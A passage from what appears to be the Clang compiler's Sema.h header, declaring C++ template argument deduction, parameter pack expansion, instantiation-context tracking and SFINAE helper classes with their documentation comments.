/// \param EllipsisLoc The location of the ellipsis.
ExprResult CheckPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Determine whether we could expand a pack expansion with the
/// given set of parameter packs into separate arguments by repeatedly
/// transforming the pattern.
///
/// \param EllipsisLoc The location of the ellipsis that identifies the
/// pack expansion.
///
/// \param PatternRange The source range that covers the entire pattern of
/// the pack expansion.
///
/// \param Unexpanded The set of unexpanded parameter packs within the
/// pattern.
///
/// \param ShouldExpand Will be set to \c true if the transformer should
/// expand the corresponding pack expansions into separate arguments. When
/// set, \c NumExpansions must also be set.
///
/// \param RetainExpansion Whether the caller should add an unexpanded
/// pack expansion after all of the expanded arguments. This is used
/// when extending explicitly-specified template argument packs per
/// C++0x [temp.arg.explicit]p9.
///
/// \param NumExpansions The number of separate arguments that will be in
/// the expanded form of the corresponding pack expansion. This is both an
/// input and an output parameter, which can be set by the caller if the
/// number of expansions is known a priori (e.g., due to a prior substitution)
/// and will be set by the callee when the number of expansions is known.
/// The callee must set this value when \c ShouldExpand is \c true; it may
/// set this value in other cases.
///
/// \returns true if an error occurred (e.g., because the parameter packs
/// are to be instantiated with arguments of different lengths), false
/// otherwise. If false, \c ShouldExpand (and possibly \c NumExpansions)
/// must be set.
bool CheckParameterPacksForExpansion(SourceLocation EllipsisLoc,
SourceRange PatternRange,
ArrayRef<UnexpandedParameterPack> Unexpanded,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool &ShouldExpand,
bool &RetainExpansion,
Optional<unsigned> &NumExpansions);
/// Determine the number of arguments in the given pack expansion
/// type.
///
/// This routine assumes that the number of arguments in the expansion is
/// consistent across all of the unexpanded parameter packs in its pattern.
///
/// Returns an empty Optional if the type can't be expanded.
Optional<unsigned> getNumArgumentsInExpansion(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Determine whether the given declarator contains any unexpanded
/// parameter packs.
///
/// This routine is used by the parser to disambiguate function declarators
/// with an ellipsis prior to the ')', e.g.,
///
/// \code
/// void f(T...);
/// \endcode
///
/// To determine whether we have an (unnamed) function parameter pack or
/// a variadic function.
///
/// \returns true if the declarator contains any unexpanded parameter packs,
/// false otherwise.
bool containsUnexpandedParameterPacks(Declarator &D);
/// Returns the pattern of the pack expansion for a template argument.
///
/// \param OrigLoc The template argument to expand.
///
/// \param Ellipsis Will be set to the location of the ellipsis.
///
/// \param NumExpansions Will be set to the number of expansions that will
/// be generated from this pack expansion, if known a priori.
TemplateArgumentLoc getTemplateArgumentPackExpansionPattern(
TemplateArgumentLoc OrigLoc,
SourceLocation &Ellipsis,
Optional<unsigned> &NumExpansions) const;
/// Given a template argument that contains an unexpanded parameter pack, but
/// which has already been substituted, attempt to determine the number of
/// elements that will be produced once this argument is fully-expanded.
///
/// This is intended for use when transforming 'sizeof...(Arg)' in order to
/// avoid actually expanding the pack where possible.
Optional<unsigned> getFullyPackExpandedSize(TemplateArgument Arg);
//===--------------------------------------------------------------------===//
// C++ Template Argument Deduction (C++ [temp.deduct])
//===--------------------------------------------------------------------===//
/// Adjust the type \p ArgFunctionType to match the calling convention,
/// noreturn, and optionally the exception specification of \p FunctionType.
/// Deduction often wants to ignore these properties when matching function
/// types.
QualType adjustCCAndNoReturn(QualType ArgFunctionType, QualType FunctionType,
bool AdjustExceptionSpec = false);
/// Describes the result of template argument deduction.
///
/// The TemplateDeductionResult enumeration describes the result of
/// template argument deduction, as returned from
/// DeduceTemplateArguments(). The separate TemplateDeductionInfo
/// structure provides additional information about the results of
/// template argument deduction, e.g., the deduced template argument
/// list (if successful) or the specific template parameters or
/// deduced arguments that were involved in the failure.
enum TemplateDeductionResult {
/// Template argument deduction was successful.
TDK_Success = 0,
/// The declaration was invalid; do nothing.
TDK_Invalid,
/// Template argument deduction exceeded the maximum template
/// instantiation depth (which has already been diagnosed).
TDK_InstantiationDepth,
/// Template argument deduction did not deduce a value
/// for every template parameter.
TDK_Incomplete,
/// Template argument deduction did not deduce a value for every
/// expansion of an expanded template parameter pack.
TDK_IncompletePack,
/// Template argument deduction produced inconsistent
/// deduced values for the given template parameter.
TDK_Inconsistent,
/// Template argument deduction failed due to inconsistent
/// cv-qualifiers on a template parameter type that would
/// otherwise be deduced, e.g., we tried to deduce T in "const T"
/// but were given a non-const "X".
TDK_Underqualified,
/// Substitution of the deduced template argument values
/// resulted in an error.
TDK_SubstitutionFailure,
/// After substituting deduced template arguments, a dependent
/// parameter type did not match the corresponding argument.
TDK_DeducedMismatch,
/// After substituting deduced template arguments, an element of
/// a dependent parameter type did not match the corresponding element
/// of the corresponding argument (when deducing from an initializer list).
TDK_DeducedMismatchNested,
/// A non-depnedent component of the parameter did not match the
/// corresponding component of the argument.
TDK_NonDeducedMismatch,
/// When performing template argument deduction for a function
/// template, there were too many call arguments.
TDK_TooManyArguments,
/// When performing template argument deduction for a function
/// template, there were too few call arguments.
TDK_TooFewArguments,
/// The explicitly-specified template arguments were not valid
/// template arguments for the given template.
TDK_InvalidExplicitArguments,
/// Checking non-dependent argument conversions failed.
TDK_NonDependentConversionFailure,
/// The deduced arguments did not satisfy the constraints associated
/// with the template.
TDK_ConstraintsNotSatisfied,
/// Deduction failed; that's all we know.
TDK_MiscellaneousDeductionFailure,
/// CUDA Target attributes do not match.
TDK_CUDATargetMismatch
};
TemplateDeductionResult
DeduceTemplateArguments(ClassTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(VarTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult SubstituteExplicitTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo &ExplicitTemplateArgs,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
SmallVectorImpl<QualType> &ParamTypes, QualType *FunctionType,
sema::TemplateDeductionInfo &Info);
/// brief A function argument from which we performed template argument
// deduction for a call.
struct OriginalCallArg {
OriginalCallArg(QualType OriginalParamType, bool DecomposedParam,
unsigned ArgIdx, QualType OriginalArgType)
: OriginalParamType(OriginalParamType),
DecomposedParam(DecomposedParam), ArgIdx(ArgIdx),
OriginalArgType(OriginalArgType) {}
QualType OriginalParamType;
bool DecomposedParam;
unsigned ArgIdx;
QualType OriginalArgType;
};
TemplateDeductionResult FinishTemplateArgumentDeduction(
FunctionTemplateDecl *FunctionTemplate,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
unsigned NumExplicitlySpecified, FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
SmallVectorImpl<OriginalCallArg> const *OriginalCallArgs = nullptr,
bool PartialOverloading = false,
llvm::function_ref<bool()> CheckNonDependent = []{ return false; });
TemplateDeductionResult DeduceTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
FunctionDecl *&Specialization, sema::TemplateDeductionInfo &Info,
bool PartialOverloading,
llvm::function_ref<bool(ArrayRef<QualType>)> CheckNonDependent);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ArgFunctionType,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
QualType ToType,
CXXConversionDecl *&Specialization,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
/// Substitute Replacement for \p auto in \p TypeWithAuto
QualType SubstAutoType(QualType TypeWithAuto, QualType Replacement);
/// Substitute Replacement for auto in TypeWithAuto
TypeSourceInfo* SubstAutoTypeSourceInfo(TypeSourceInfo *TypeWithAuto,
QualType Replacement);
/// Completely replace the \c auto in \p TypeWithAuto by
/// \p Replacement. This does not retain any \c auto type sugar.
QualType ReplaceAutoType(QualType TypeWithAuto, QualType Replacement);
/// Result type of DeduceAutoType.
enum DeduceAutoResult {
DAR_Succeeded,
DAR_Failed,
DAR_FailedAlreadyDiagnosed
};
DeduceAutoResult
DeduceAutoType(TypeSourceInfo *AutoType, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None,
bool IgnoreConstraints = false);
DeduceAutoResult
DeduceAutoType(TypeLoc AutoTypeLoc, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None,
bool IgnoreConstraints = false);
void DiagnoseAutoDeductionFailure(VarDecl *VDecl, Expr *Init);
bool DeduceReturnType(FunctionDecl *FD, SourceLocation Loc,
bool Diagnose = true);
/// Declare implicit deduction guides for a class template if we've
/// not already done so.
void DeclareImplicitDeductionGuides(TemplateDecl *Template,
SourceLocation Loc);
QualType DeduceTemplateSpecializationFromInitializer(
TypeSourceInfo *TInfo, const InitializedEntity &Entity,
const InitializationKind &Kind, MultiExprArg Init);
QualType deduceVarTypeFromInitializer(VarDecl *VDecl, DeclarationName Name,
QualType Type, TypeSourceInfo *TSI,
SourceRange Range, bool DirectInit,
Expr *Init);
TypeLoc getReturnTypeLoc(FunctionDecl *FD) const;
bool DeduceFunctionTypeFromReturnExpr(FunctionDecl *FD,
SourceLocation ReturnLoc,
Expr *&RetExpr, AutoType *AT);
FunctionTemplateDecl *getMoreSpecializedTemplate(
FunctionTemplateDecl *FT1, FunctionTemplateDecl *FT2, SourceLocation Loc,
TemplatePartialOrderingContext TPOC, unsigned NumCallArguments1,
unsigned NumCallArguments2, bool Reversed = false);
UnresolvedSetIterator
getMostSpecialized(UnresolvedSetIterator SBegin, UnresolvedSetIterator SEnd,
TemplateSpecCandidateSet &FailedCandidates,
SourceLocation Loc,
const PartialDiagnostic &NoneDiag,
const PartialDiagnostic &AmbigDiag,
const PartialDiagnostic &CandidateDiag,
bool Complain = true, QualType TargetType = QualType());
ClassTemplatePartialSpecializationDecl *
getMoreSpecializedPartialSpecialization(
ClassTemplatePartialSpecializationDecl *PS1,
ClassTemplatePartialSpecializationDecl *PS2,
SourceLocation Loc);
bool isMoreSpecializedThanPrimary(ClassTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
VarTemplatePartialSpecializationDecl *getMoreSpecializedPartialSpecialization(
VarTemplatePartialSpecializationDecl *PS1,
VarTemplatePartialSpecializationDecl *PS2, SourceLocation Loc);
bool isMoreSpecializedThanPrimary(VarTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
bool isTemplateTemplateParameterAtLeastAsSpecializedAs(
TemplateParameterList *PParam, TemplateDecl *AArg, SourceLocation Loc);
void MarkUsedTemplateParameters(const Expr *E, bool OnlyDeduced,
unsigned Depth, llvm::SmallBitVector &Used);
void MarkUsedTemplateParameters(const TemplateArgumentList &TemplateArgs,
bool OnlyDeduced,
unsigned Depth,
llvm::SmallBitVector &Used);
void MarkDeducedTemplateParameters(
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced) {
return MarkDeducedTemplateParameters(Context, FunctionTemplate, Deduced);
}
static void MarkDeducedTemplateParameters(ASTContext &Ctx,
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced);
//===--------------------------------------------------------------------===//
// C++ Template Instantiation
//
MultiLevelTemplateArgumentList
getTemplateInstantiationArgs(NamedDecl *D,
const TemplateArgumentList *Innermost = nullptr,
bool RelativeToPrimary = false,
const FunctionDecl *Pattern = nullptr);
/// A context in which code is being synthesized (where a source location
/// alone is not sufficient to identify the context). This covers template
/// instantiation and various forms of implicitly-generated functions.
struct CodeSynthesisContext {
/// The kind of template instantiation we are performing
enum SynthesisKind {
/// We are instantiating a template declaration. The entity is
/// the declaration we're instantiating (e.g., a CXXRecordDecl).
TemplateInstantiation,
/// We are instantiating a default argument for a template
/// parameter. The Entity is the template parameter whose argument is
/// being instantiated, the Template is the template, and the
/// TemplateArgs/NumTemplateArguments provide the template arguments as
/// specified.
DefaultTemplateArgumentInstantiation,
/// We are instantiating a default argument for a function.
/// The Entity is the ParmVarDecl, and TemplateArgs/NumTemplateArgs
/// provides the template arguments as specified.
DefaultFunctionArgumentInstantiation,
/// We are substituting explicit template arguments provided for
/// a function template. The entity is a FunctionTemplateDecl.
ExplicitTemplateArgumentSubstitution,
/// We are substituting template argument determined as part of
/// template argument deduction for either a class template
/// partial specialization or a function template. The
/// Entity is either a {Class|Var}TemplatePartialSpecializationDecl or
/// a TemplateDecl.
DeducedTemplateArgumentSubstitution,
/// We are substituting prior template arguments into a new
/// template parameter. The template parameter itself is either a
/// NonTypeTemplateParmDecl or a TemplateTemplateParmDecl.
PriorTemplateArgumentSubstitution,
/// We are checking the validity of a default template argument that
/// has been used when naming a template-id.
DefaultTemplateArgumentChecking,
/// We are computing the exception specification for a defaulted special
/// member function.
ExceptionSpecEvaluation,
/// We are instantiating the exception specification for a function
/// template which was deferred until it was needed.
ExceptionSpecInstantiation,
/// We are instantiating a requirement of a requires expression.
RequirementInstantiation,
/// We are checking the satisfaction of a nested requirement of a requires
/// expression.
NestedRequirementConstraintsCheck,
/// We are declaring an implicit special member function.
DeclaringSpecialMember,
/// We are declaring an implicit 'operator==' for a defaulted
/// 'operator<=>'.
DeclaringImplicitEqualityComparison,
/// We are defining a synthesized function (such as a defaulted special
/// member).
DefiningSynthesizedFunction,
// We are checking the constraints associated with a constrained entity or
// the constraint expression of a concept. This includes the checks that
// atomic constraints have the type 'bool' and that they can be constant
// evaluated.
ConstraintsCheck,
// We are substituting template arguments into a constraint expression.
ConstraintSubstitution,
// We are normalizing a constraint expression.
ConstraintNormalization,
// We are substituting into the parameter mapping of an atomic constraint
// during normalization.
ParameterMappingSubstitution,
/// We are rewriting a comparison operator in terms of an operator<=>.
RewritingOperatorAsSpaceship,
/// Added for Template instantiation observation.
/// Memoization means we are _not_ instantiating a template because
/// it is already instantiated (but we entered a context where we
/// would have had to if it was not already instantiated).
Memoization
} Kind;
/// Was the enclosing context a non-instantiation SFINAE context?
bool SavedInNonInstantiationSFINAEContext;
/// The point of instantiation or synthesis within the source code.
SourceLocation PointOfInstantiation;
/// The entity that is being synthesized.
Decl *Entity;
/// The template (or partial specialization) in which we are
/// performing the instantiation, for substitutions of prior template
/// arguments.
NamedDecl *Template;
/// The list of template arguments we are substituting, if they
/// are not part of the entity.
const TemplateArgument *TemplateArgs;
// FIXME: Wrap this union around more members, or perhaps store the
// kind-specific members in the RAII object owning the context.
union {
/// The number of template arguments in TemplateArgs.
unsigned NumTemplateArgs;
/// The special member being declared or defined.
CXXSpecialMember SpecialMember;
};
ArrayRef<TemplateArgument> template_arguments() const {
assert(Kind != DeclaringSpecialMember);
return {TemplateArgs, NumTemplateArgs};
}
/// The template deduction info object associated with the
/// substitution or checking of explicit or deduced template arguments.
sema::TemplateDeductionInfo *DeductionInfo;
/// The source range that covers the construct that cause
/// the instantiation, e.g., the template-id that causes a class
/// template instantiation.
SourceRange InstantiationRange;
CodeSynthesisContext()
: Kind(TemplateInstantiation),
SavedInNonInstantiationSFINAEContext(false), Entity(nullptr),
Template(nullptr), TemplateArgs(nullptr), NumTemplateArgs(0),
DeductionInfo(nullptr) {}
/// Determines whether this template is an actual instantiation
/// that should be counted toward the maximum instantiation depth.
bool isInstantiationRecord() const;
};
/// List of active code synthesis contexts.
///
/// This vector is treated as a stack. As synthesis of one entity requires
/// synthesis of another, additional contexts are pushed onto the stack.
SmallVector<CodeSynthesisContext, 16> CodeSynthesisContexts;
/// Specializations whose definitions are currently being instantiated.
llvm::DenseSet<std::pair<Decl *, unsigned>> InstantiatingSpecializations;
/// Non-dependent types used in templates that have already been instantiated
/// by some template instantiation.
llvm::DenseSet<QualType> InstantiatedNonDependentTypes;
/// Extra modules inspected when performing a lookup during a template
/// instantiation. Computed lazily.
SmallVector<Module*, 16> CodeSynthesisContextLookupModules;
/// Cache of additional modules that should be used for name lookup
/// within the current template instantiation. Computed lazily; use
/// getLookupModules() to get a complete set.
llvm::DenseSet<Module*> LookupModulesCache;
/// Get the set of additional modules that should be checked during
/// name lookup. A module and its imports become visible when instanting a
/// template defined within it.
llvm::DenseSet<Module*> &getLookupModules();
/// Map from the most recent declaration of a namespace to the most
/// recent visible declaration of that namespace.
llvm::DenseMap<NamedDecl*, NamedDecl*> VisibleNamespaceCache;
/// Whether we are in a SFINAE context that is not associated with
/// template instantiation.
///
/// This is used when setting up a SFINAE trap (\c see SFINAETrap) outside
/// of a template instantiation or template argument deduction.
bool InNonInstantiationSFINAEContext;
/// The number of \p CodeSynthesisContexts that are not template
/// instantiations and, therefore, should not be counted as part of the
/// instantiation depth.
///
/// When the instantiation depth reaches the user-configurable limit
/// \p LangOptions::InstantiationDepth we will abort instantiation.
// FIXME: Should we have a similar limit for other forms of synthesis?
unsigned NonInstantiationEntries;
/// The depth of the context stack at the point when the most recent
/// error or warning was produced.
///
/// This value is used to suppress printing of redundant context stacks
/// when there are multiple errors or warnings in the same instantiation.
// FIXME: Does this belong in Sema? It's tough to implement it anywhere else.
unsigned LastEmittedCodeSynthesisContextDepth = 0;
/// The template instantiation callbacks to trace or track
/// instantiations (objects can be chained).
///
/// This callbacks is used to print, trace or track template
/// instantiations as they are being constructed.
std::vector<std::unique_ptr<TemplateInstantiationCallback>>
TemplateInstCallbacks;
/// The current index into pack expansion arguments that will be
/// used for substitution of parameter packs.
///
/// The pack expansion index will be -1 to indicate that parameter packs
/// should be instantiated as themselves. Otherwise, the index specifies
/// which argument within the parameter pack will be used for substitution.
int ArgumentPackSubstitutionIndex;
/// RAII object used to change the argument pack substitution index
/// within a \c Sema object.
///
/// See \c ArgumentPackSubstitutionIndex for more information.
class ArgumentPackSubstitutionIndexRAII {
Sema &Self;
int OldSubstitutionIndex;
public:
ArgumentPackSubstitutionIndexRAII(Sema &Self, int NewSubstitutionIndex)
: Self(Self), OldSubstitutionIndex(Self.ArgumentPackSubstitutionIndex) {
Self.ArgumentPackSubstitutionIndex = NewSubstitutionIndex;
}
~ArgumentPackSubstitutionIndexRAII() {
Self.ArgumentPackSubstitutionIndex = OldSubstitutionIndex;
}
};
friend class ArgumentPackSubstitutionRAII;
/// For each declaration that involved template argument deduction, the
/// set of diagnostics that were suppressed during that template argument
/// deduction.
///
/// FIXME: Serialize this structure to the AST file.
typedef llvm::DenseMap<Decl *, SmallVector<PartialDiagnosticAt, 1> >
SuppressedDiagnosticsMap;
SuppressedDiagnosticsMap SuppressedDiagnostics;
/// A stack object to be created when performing template
/// instantiation.
///
/// Construction of an object of type \c InstantiatingTemplate
/// pushes the current instantiation onto the stack of active
/// instantiations. If the size of this stack exceeds the maximum
/// number of recursive template instantiations, construction
/// produces an error and evaluates true.
///
/// Destruction of this object will pop the named instantiation off
/// the stack.
struct InstantiatingTemplate {
/// Note that we are instantiating a class template,
/// function template, variable template, alias template,
/// or a member thereof.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
Decl *Entity,
SourceRange InstantiationRange = SourceRange());
struct ExceptionSpecification {};
/// Note that we are instantiating an exception specification
/// of a function template.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionDecl *Entity, ExceptionSpecification,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument in a
/// template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateParameter Param, TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting either explicitly-specified or
/// deduced template arguments during function template argument deduction.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionTemplateDecl *FunctionTemplate,
ArrayRef<TemplateArgument> TemplateArgs,
CodeSynthesisContext::SynthesisKind Kind,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template declaration.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ClassTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a variable template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
VarTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument for a function
/// parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParmVarDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting prior template arguments into a
/// non-type parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
NonTypeTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are substituting prior template arguments into a
/// template template parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
TemplateTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are checking the default template argument
/// against the template parameter for a given template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
NamedDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintsCheck {};
/// \brief Note that we are checking the constraints associated with some
/// constrained entity (a concept declaration or a template with associated
/// constraints).
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintsCheck, NamedDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintSubstitution {};
/// \brief Note that we are checking a constraint expression associated
/// with a template declaration or as part of the satisfaction check of a
/// concept.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintSubstitution, NamedDecl *Template,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange);
struct ConstraintNormalization {};
/// \brief Note that we are normalizing a constraint expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintNormalization, NamedDecl *Template,
SourceRange InstantiationRange);
struct ParameterMappingSubstitution {};
/// \brief Note that we are subtituting into the parameter mapping of an
/// atomic constraint during constraint normalization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParameterMappingSubstitution, NamedDecl *Template,
SourceRange InstantiationRange);
/// \brief Note that we are substituting template arguments into a part of
/// a requirement of a requires expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
concepts::Requirement *Req,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// \brief Note that we are checking the satisfaction of the constraint
/// expression inside of a nested requirement.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
concepts::NestedRequirement *Req, ConstraintsCheck,
SourceRange InstantiationRange = SourceRange());
/// Note that we have finished instantiating this template.
void Clear();
~InstantiatingTemplate() { Clear(); }
/// Determines whether we have exceeded the maximum
/// recursive template instantiations.
bool isInvalid() const { return Invalid; }
/// Determine whether we are already instantiating this
/// specialization in some surrounding active instantiation.
bool isAlreadyInstantiating() const { return AlreadyInstantiating; }
private:
Sema &SemaRef;
bool Invalid;
bool AlreadyInstantiating;
bool CheckInstantiationDepth(SourceLocation PointOfInstantiation,
SourceRange InstantiationRange);
InstantiatingTemplate(
Sema &SemaRef, CodeSynthesisContext::SynthesisKind Kind,
SourceLocation PointOfInstantiation, SourceRange InstantiationRange,
Decl *Entity, NamedDecl *Template = nullptr,
ArrayRef<TemplateArgument> TemplateArgs = None,
sema::TemplateDeductionInfo *DeductionInfo = nullptr);
InstantiatingTemplate(const InstantiatingTemplate&) = delete;
InstantiatingTemplate&
operator=(const InstantiatingTemplate&) = delete;
};
void pushCodeSynthesisContext(CodeSynthesisContext Ctx);
void popCodeSynthesisContext();
/// Determine whether we are currently performing template instantiation.
bool inTemplateInstantiation() const {
return CodeSynthesisContexts.size() > NonInstantiationEntries;
}
void PrintContextStack() {
if (!CodeSynthesisContexts.empty() &&
CodeSynthesisContexts.size() != LastEmittedCodeSynthesisContextDepth) {
PrintInstantiationStack();
LastEmittedCodeSynthesisContextDepth = CodeSynthesisContexts.size();
}
if (PragmaAttributeCurrentTargetDecl)
PrintPragmaAttributeInstantiationPoint();
}
void PrintInstantiationStack();
void PrintPragmaAttributeInstantiationPoint();
/// Determines whether we are currently in a context where
/// template argument substitution failures are not considered
/// errors.
///
/// \returns An empty \c Optional if we're not in a SFINAE context.
/// Otherwise, contains a pointer that, if non-NULL, contains the nearest
/// template-deduction context object, which can be used to capture
/// diagnostics that will be suppressed.
Optional<sema::TemplateDeductionInfo *> isSFINAEContext() const;
/// Determines whether we are currently in a context that
/// is not evaluated as per C++ [expr] p5.
bool isUnevaluatedContext() const {
assert(!ExprEvalContexts.empty() &&
"Must be in an expression evaluation context");
return ExprEvalContexts.back().isUnevaluated();
}
/// RAII class used to determine whether SFINAE has
/// trapped any errors that occur during template argument
/// deduction.
class SFINAETrap {
Sema &SemaRef;
unsigned PrevSFINAEErrors;
bool PrevInNonInstantiationSFINAEContext;
bool PrevAccessCheckingSFINAE;
bool PrevLastDiagnosticIgnored;
public:
explicit SFINAETrap(Sema &SemaRef, bool AccessCheckingSFINAE = false)
: SemaRef(SemaRef), PrevSFINAEErrors(SemaRef.NumSFINAEErrors),
PrevInNonInstantiationSFINAEContext(
SemaRef.InNonInstantiationSFINAEContext),
PrevAccessCheckingSFINAE(SemaRef.AccessCheckingSFINAE),
PrevLastDiagnosticIgnored(
SemaRef.getDiagnostics().isLastDiagnosticIgnored())
{
if (!SemaRef.isSFINAEContext())
SemaRef.InNonInstantiationSFINAEContext = true;
SemaRef.AccessCheckingSFINAE = AccessCheckingSFINAE;
}
~SFINAETrap() {
SemaRef.NumSFINAEErrors = PrevSFINAEErrors;
SemaRef.InNonInstantiationSFINAEContext
= PrevInNonInstantiationSFINAEContext;
SemaRef.AccessCheckingSFINAE = PrevAccessCheckingSFINAE;
SemaRef.getDiagnostics().setLastDiagnosticIgnored(
PrevLastDiagnosticIgnored);
}
/// Determine whether any SFINAE errors have been trapped.
bool hasErrorOccurred() const {
return SemaRef.NumSFINAEErrors > PrevSFINAEErrors;
}
};
/// RAII class used to indicate that we are performing provisional
/// semantic analysis to determine the validity of a construct, so
/// typo-correction and diagnostics in the immediate context (not within
/// implicitly-instantiated templates) should be suppressed.
class TentativeAnalysisScope {
Sema &SemaRef;
// FIXME: Using a SFINAETrap for this is a hack.
SFINAETrap Trap;
bool PrevDisableTypoCorrection;
public:
explicit TentativeAnalysisScope(Sema &SemaRef)
: SemaRef(SemaRef), Trap(SemaRef, true),
PrevDisableTypoCorrection(SemaRef.DisableTypoCorrection) {
SemaRef.DisableTypoCorrection = true;
}
~TentativeAnalysisScope() {
SemaRef.DisableTypoCorrection = PrevDisableTypoCorrection;
}
};
/// The current instantiation scope used to store local
/// variables.
LocalInstantiationScope *CurrentInstantiationScope;
/// Tracks whether we are in a context where typo correction is
/// disabled.
bool DisableTypoCorrection;
/// The number of typos corrected by CorrectTypo.
unsigned TyposCorrected;
typedef llvm::SmallSet<SourceLocation, 2> SrcLocSet;
typedef llvm::DenseMap<IdentifierInfo *, SrcLocSet> IdentifierSourceLocations;
/// A cache containing identifiers for which typo correction failed and
/// their locations, so that repeated attempts to correct an identifier in a
/// given location are ignored if typo correction already failed for it.
IdentifierSourceLocations TypoCorrectionFailures;
/// Worker object for performing CFG-based warnings.
sema::AnalysisBasedWarnings AnalysisWarnings;
threadSafety::BeforeSet *ThreadSafetyDeclCache;
/// An entity for which implicit template instantiation is required.
///
/// The source location associated with the declaration is the first place in
/// the source code where the declaration was "used". It is not necessarily
/// the point of instantiation (which will be either before or after the
/// namespace-scope declaration that triggered this implicit instantiation),
/// However, it is the location that diagnostics should generally refer to,
/// because users will need to know what code triggered the instantiation.
typedef std::pair<ValueDecl *, SourceLocation> PendingImplicitInstantiation;
/// The queue of implicit template instantiations that are required
/// but have not yet been performed.
std::deque<PendingImplicitInstantiation> PendingInstantiations;
/// Queue of implicit template instantiations that cannot be performed
/// eagerly.
SmallVector<PendingImplicitInstantiation, 1> LateParsedInstantiations;
class GlobalEagerInstantiationScope {
public:
GlobalEagerInstantiationScope(Sema &S, bool Enabled)
: S(S), Enabled(Enabled) {
if (!Enabled) return;
SavedPendingInstantiations.swap(S.PendingInstantiations);
SavedVTableUses.swap(S.VTableUses);
}
void perform() {
if (Enabled) {
S.DefineUsedVTables();
S.PerformPendingInstantiations();
}
}
~GlobalEagerInstantiationScope() {
if (!Enabled) return;
// Restore the set of pending vtables.
assert(S.VTableUses.empty() &&
"VTableUses should be empty before it is discarded.");
S.VTableUses.swap(SavedVTableUses);
// Restore the set of pending implicit instantiations.
assert(S.PendingInstantiations.empty() &&
